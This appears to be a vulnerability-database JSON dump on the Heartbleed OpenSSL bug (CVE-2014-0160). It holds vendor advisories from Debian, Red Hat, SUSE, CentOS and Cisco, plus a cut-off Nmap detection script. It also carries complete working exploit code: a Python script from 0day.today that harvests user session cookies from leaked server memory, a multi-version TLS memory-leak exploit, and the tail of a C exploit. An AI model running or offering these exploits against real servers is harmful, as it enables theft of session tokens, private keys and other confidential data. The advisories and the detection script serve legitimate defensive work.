loop\\n\");\n\t\t\tfirst=0;\n\t\t\trepeat=1;\n\t\t\theartbleed(c,type);\n\t\t\twhile(repeat==1){\n\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t}\n\t\t}\n\t\tprintf(\"[ 
done.\\n\");\n\t\texit(0);\n\t}\n\telse{\n\t\tint sd, pid, i;\n\t\tret = tcp_bind(host, port);\n\t\twhile(1){\n \t\t\tsd=accept(ret,0,0);\n\t\t\tif(sd==-1){\n\t\t\t\tprintf(\"[!] FATAL: problem with accept()\\n\");\n\t\t\t\texit(0);\n\t\t\t}\n\t\t\tif(pid=fork()){\n\t\t\t\tclose(sd);\n\t\t\t}\n \t\t\telse{\n\t\t\t\tc = tls_bind(sd);\n\t\t\t\tpre_cmd(ret, precmd, verbose);\n\t\t\t\theartbleed(c,type);\n\t\t\t\twhile(repeat==1){\n\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t}\n\t\t\t\twhile(loop==1){\n\t\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\t\tfirst=0;\n\t\t\t\t\trepeat=0;\n\t\t\t\t\theartbleed(c,type);\n\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tprintf(\"[ done.\\n\");\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\t}\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T00:52:35", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2896-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nApril 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0160\nDebian Bug : 743883\n\nA vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Heartbeat extension. Up to 64KB of memory from either client or\nserver can be recovered by an attacker. This vulnerability might allow an\nattacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. 
More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2014-04-07T21:37:07", "published": "2014-04-07T21:37:07", "id": "DEBIAN:DSA-2896-1:7AEC1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00071.html", "title": "[SECURITY] [DSA 2896-1] openssl security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. 
(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "modified": "2018-06-06T20:24:06", "published": "2014-04-08T04:00:00", "id": "RHSA-2014:0376", "href": "https://access.redhat.com/errata/RHSA-2014:0376", "type": "redhat", "title": "(RHSA-2014:0376) Important: openssl security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:17", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll users of Red Hat Storage are advised to upgrade to these updated\npackages, which contain a backported patch to correct this issue. 
For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n", "modified": "2015-04-24T14:20:43", "published": "2014-04-08T04:00:00", "id": "RHSA-2014:0377", "href": "https://access.redhat.com/errata/RHSA-2014:0377", "type": "redhat", "title": "(RHSA-2014:0377) Important: openssl security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-03-14T02:43:51", "edition": 2, "description": "This python script is a modification of the heartbleed proof of concept exploit that looks for cookies, specifically user sessions.", "published": "2014-04-09T00:00:00", "type": "zdt", "title": "Heartbleed User Session Extraction Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22118", "href": "https://0day.today/exploit/description/22118", "sourceData": "#!/usr/bin/python\r\n\r\n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.\r\n# Michael Davis ([email\u00a0protected])\r\n\r\n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n\r\n# The author disclaims copyright to this source code.\r\n\r\nimport select\r\nimport sys\r\nimport string\r\nimport struct\r\nimport socket\r\nimport time\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. 
(default: session)')\r\n\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\n\r\nclass HeartBleeder(object):\r\n\r\n server_response = None\r\n socket = None\r\n hostname = ''\r\n port = 443\r\n found_sessions = set()\r\n cookie = 'session'\r\n cookie_length = 56\r\n\r\n def __init__(self, hostname='', cookie=''):\r\n self.hostname = hostname\r\n self.cookie = cookie\r\n\r\n def connect(self):\r\n \"\"\"\r\n Connects to the remote server.\r\n \"\"\"\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sys.stdout.flush()\r\n self.socket.connect((self.hostname, self.port))\r\n sys.stdout.flush()\r\n self.socket.send(hello)\r\n sys.stdout.flush()\r\n\r\n def rcv_response(self):\r\n while True:\r\n _type, version, payload = self.rcv_message()\r\n if _type is None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if _type == 22 and ord(payload[0]) == 0x0E:\r\n break\r\n\r\n def rcv_message(self):\r\n\r\n record_header = self.rcv_all(5)\r\n if record_header is None:\r\n print 'Unexpected EOF receiving record header - server closed 
connection'\r\n return None, None, None\r\n _type, version, line = struct.unpack('>BHH', record_header)\r\n payload = self.rcv_all(line, 10)\r\n if payload is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return _type, version, payload\r\n\r\n def rcv_all(self, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([self.socket], [], [], 5)\r\n if self.socket in r:\r\n data = self.socket.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n\r\n def try_heartbeat(self):\r\n self.socket.send(hb)\r\n while True:\r\n _type, version, self.payload = self.rcv_message()\r\n if _type is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if _type == 24:\r\n # print 'Received heartbeat response:'\r\n self.parse_response()\r\n if len(self.payload) > 3:\r\n pass\r\n # print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if _type == 21:\r\n print 'Received alert:'\r\n self.hexdump(self.payload)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\n def parse_response(self):\r\n \"\"\"\r\n Parses the response from the server for a session id.\r\n \"\"\"\r\n ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)\r\n index = string.find(ascii, self.cookie)\r\n if index >= 0:\r\n info = ascii[index:index + self.cookie_length]\r\n session = info.split(' ')[0]\r\n session = string.replace(session, ';', '')\r\n if session not in self.found_sessions:\r\n 
self.found_sessions.add(session)\r\n print session\r\n\r\n def hexdump(self, payload):\r\n \"\"\"\r\n Prints out a hexdump in the event that server returns an error.\r\n \"\"\"\r\n for b in xrange(0, len(payload), 16):\r\n line = [c for c in payload[b:b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in line)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\n def scan(self):\r\n self.connect()\r\n self.rcv_response()\r\n self.try_heartbeat()\r\n\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n cookies_str = 'session'\r\n if len(args) > 1:\r\n cookies_str = args[1]\r\n\r\n print cookies_str\r\n\r\n while True:\r\n heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)\r\n heartbeat.scan()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22118"}, {"lastseen": "2018-03-03T01:40:21", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2014-04-09T00:00:00", "type": "zdt", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22122", "href": "https://0day.today/exploit/description/22122", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n \r\n \r\n#!/usr/bin/env python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by 
Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n \r\ndef create_hello(version):\r\n hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n return hello\r\n \r\ndef create_hb(version):\r\n hb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n return hb\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s,hb):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n for i in range(len(version)):\r\n print 'Trying ' + version[i][0] + '...'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n 
sys.stdout.flush()\r\n s.send(create_hello(version[i][1]))\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(create_hb(version[i][1]))\r\n if hit_hb(s,create_hb(version[i][1])):\r\n #Stop if vulnerable\r\n break\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22122"}], "suse": [{"lastseen": "2016-09-04T11:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\n\n", "edition": 1, "modified": "2014-04-08T13:04:15", "published": "2014-04-08T13:04:15", "id": "OPENSUSE-SU-2014:0492-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "title": "update for openssl (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2019-12-20T18:23:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0376\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. 
A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/032287.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html", "edition": 3, "modified": "2014-04-08T02:54:58", "published": "2014-04-08T02:54:58", "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/032287.html", "id": "CESA-2014:0376", "title": "openssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisco": [{"lastseen": "2020-12-24T11:41:41", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "A vulnerability in the Transport Layer Security (TLS)/Datagram Transport Layer Security (DTLS) heartbeat functionality in OpenSSL used in multiple Cisco products could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.\n\nThe vulnerability is due to a missing bounds check in the handling of the TLS heartbeat extension. 
An attacker could exploit this vulnerability by implementing a malicious TLS or DTLS client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. The attacker could then send a specially-crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.\n\nMultiple Cisco products incorporate a version of the OpenSSL package affected by a vulnerability that could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.\n\nThe vulnerability is due to a missing bounds check in the handling of the Transport Layer Security (TLS) heartbeat extension. An attacker could exploit this vulnerability by implementing a malicious TLS or Datagram Transport Layer Security (DTLS) client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. An exploit could send a specially crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.\n\nPlease note that the devices that are affected by this vulnerability are the devices acting as an SSL server terminating SSL connections or devices acting as an SSL Client initiating an SSL connection. 
Devices that are simply traversed by SSL traffic without terminating it are not affected.\n\nThis advisory will be updated as additional information becomes available. Cisco will release software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities may be available.\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed\"]", "modified": "2014-10-29T16:11:45", "published": "2014-04-09T03:00:00", "id": "CISCO-SA-20140409-HEARTBLEED", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed", "type": "cisco", "title": "OpenSSL Heartbeat Extension Vulnerability in Multiple Cisco Products", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:58", "description": "Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n\n## Script Arguments \n\n#### ssl-heartbleed.protocols \n\n(default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. 
\n\n## Example Usage \n \n \n nmap -p 443 --script ssl-heartbleed <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 443/tcp open https\n | ssl-heartbleed:\n | VULNERABLE:\n | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n | State: VULNERABLE\n | Risk factor: High\n | Description:\n | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n |\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n | http://www.openssl.org/news/secadv_20140407.txt\n |_ http://cvedetails.com/cve/2014-0160/\n \n \n\n## Requires \n\n * match\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * tableaux\n * vulns\n * tls\n\n* * *\n", "edition": 14, "published": "2014-04-09T01:49:29", "title": "ssl-heartbleed NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-11-06T15:07:01", "id": "NMAP:SSL-HEARTBLEED.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-heartbleed.html", "sourceData": "local match = require('match')\nlocal nmap = require('nmap')\nlocal shortport = require('shortport')\nlocal sslcert = require('sslcert')\nlocal stdnse = require('stdnse')\nlocal string = require \"string\"\nlocal tableaux = require \"tableaux\"\nlocal vulns = require('vulns')\nlocal have_tls, tls = pcall(require,'tls')\nassert(have_tls, \"This script requires the tls.lua library from https://nmap.org/nsedoc/lib/tls.html\")\n\ndescription = [[\nDetects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160).\nThe code is based on the Python script ssltest.py authored by 
Jared Stafford (jspenguin@jspenguin.org)\n]]\n\n---\n-- @usage\n-- nmap -p 443 --script ssl-heartbleed <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open https\n-- | ssl-heartbleed:\n-- | VULNERABLE:\n-- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n-- | State: VULNERABLE\n-- | Risk factor: High\n-- | Description:\n-- | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n-- |\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n-- | http://www.openssl.org/news/secadv_20140407.txt\n-- |_ http://cvedetails.com/cve/2014-0160/\n--\n--\n-- @args ssl-heartbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n--\n\nauthor = \"Patrik Karlsson <patrik@cqure.net>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"vuln\", \"safe\" }\ndependencies = {\"https-redirect\"}\n\nlocal arg_protocols = stdnse.get_script_args(SCRIPT_NAME .. 
\".protocols\") or {'TLSv1.0', 'TLSv1.1', 'TLSv1.2'}\n\nportrule = function(host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function recvhdr(s)\n local status, hdr = s:receive_buf(match.numbytes(5), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record header - server closed connection')\n return\n end\n local typ, ver, ln = string.unpack('>B I2 I2', hdr)\n return status, typ, ver, ln\nend\n\nlocal function recvmsg(s, len)\n local status, pay = s:receive_buf(match.numbytes(len), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record payload - server closed connection')\n return\n end\n return true, pay\nend\n\nlocal function testversion(host, port, version)\n\n local hello = tls.client_hello({\n [\"protocol\"] = version,\n -- Claim to support every cipher\n -- Doesn't work with IIS, but IIS isn't vulnerable\n [\"ciphers\"] = tableaux.keys(tls.CIPHERS),\n [\"compressors\"] = {\"NULL\"},\n [\"extensions\"] = {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n [\"heartbeat\"] = \"\\x01\", -- peer_not_allowed_to_send\n },\n })\n\n local payload = \"Nmap ssl-heartbleed\"\n local hb = tls.record_write(\"heartbeat\", version, string.pack(\"B>I2\",\n 1, -- HeartbeatMessageType heartbeat_request\n 0x4000) -- payload length (falsified)\n -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet\n -- header + 1 to overflow\n .. 
payload -- less than payload length.\n )\n\n local status, s, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, s = specialized(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", s)\n return\n end\n else\n s = nmap.new_socket()\n status, err = s:connect(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n s:set_timeout(5000)\n\n -- Send Client Hello to the target server\n status, err = s:send(hello)\n if not status then\n stdnse.debug1(\"Couldn't send Client Hello: %s\", err)\n s:close()\n return nil\n end\n\n -- Read response\n local done = false\n local supported = false\n local i = 1\n local response\n repeat\n status, response, err = tls.record_buffer(s, response, i)\n if err == \"TIMEOUT\" then\n -- Timed out while waiting for server_hello_done\n -- Could be client certificate required or other message required\n -- Let's just drop out and try sending the heartbeat anyway.\n done = true\n break\n elseif not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n s:close()\n return nil\n end\n\n local record\n i, record = tls.record_read(response, i)\n if record == nil then\n stdnse.debug1(\"Unknown response from server\")\n s:close()\n return nil\n elseif record.protocol ~= version then\n stdnse.debug1(\"Protocol version mismatch\")\n s:close()\n return nil\n end\n\n if record.type == 